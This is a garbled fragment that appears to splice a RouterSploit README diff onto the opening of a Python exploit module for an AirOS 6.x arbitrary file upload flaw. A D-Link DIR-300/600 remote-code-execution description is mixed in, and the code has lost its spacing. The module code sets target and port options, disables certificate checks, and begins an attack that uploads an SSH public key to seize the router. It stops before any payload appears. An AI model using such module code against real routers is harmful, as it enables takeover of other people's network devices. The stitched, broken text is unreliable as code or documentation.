Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.
...
...
@@ -101,7 +126,7 @@ Display information about exploit:
Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.
Exploit implementation for AirOS 6.x - Arbitrary File Upload.
If the target is vulnerable is possible to take full control of the router
'''
__info__={
'name':'AirOS 6.x - Arbitrary File Upload',
'description':'Exploit implementation for AirOS 6.x - Arbitrary File Upload. If the target is vulnerable is possible to take full control of the router',
'authors':[
'93c08539',#Vulnerability discovery
'Vinicius Henrique Marangoni'#routersploit module
],
'references':[
'https://hackerone.com/reports/73480',
'https://www.exploit-db.com/exploits/39701/'
],
'devices':[
'AirOS 6.x'
]
}
target=exploits.Option('','Target address e.g. https://192.168.1.1')#Target address
port=exploits.Option(443,'Target port e.g. 443')#Default port
#Disable certificate verification warnings
requests.packages.urllib3.disable_warnings()
defrun(self):
if(self.check()):
print_success('Target is vulnerable')
print_success('Trying to exploit by uploading SSH public key')